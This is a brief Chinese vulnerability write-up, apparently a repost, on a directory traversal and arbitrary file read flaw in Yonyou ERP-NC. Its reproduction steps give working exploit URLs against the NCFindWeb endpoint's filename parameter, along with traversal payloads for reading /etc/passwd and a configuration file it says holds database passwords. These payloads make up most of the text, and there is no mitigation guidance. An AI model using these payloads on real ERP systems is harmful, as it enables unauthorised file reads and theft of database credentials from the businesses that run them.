漏洞简介
用友ERP-NC 存在目录遍历和任意文件读取漏洞,攻击者可以通过该漏洞获取敏感文件信息。
漏洞复现
复现步骤
1.目录遍历payload
http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=
2.文件读取直接在filename后面加要读取的文件名即可
http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp
3.支持跨目录读取比较敏感的文件
../../../../../../../../../../etc/passwd
../../ierp/bin/prop.xml #配置文件,包含数据库密码等
漏洞检测
安全小工坊
扫描二维码
关注我们!
文章转载自安全小工坊,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。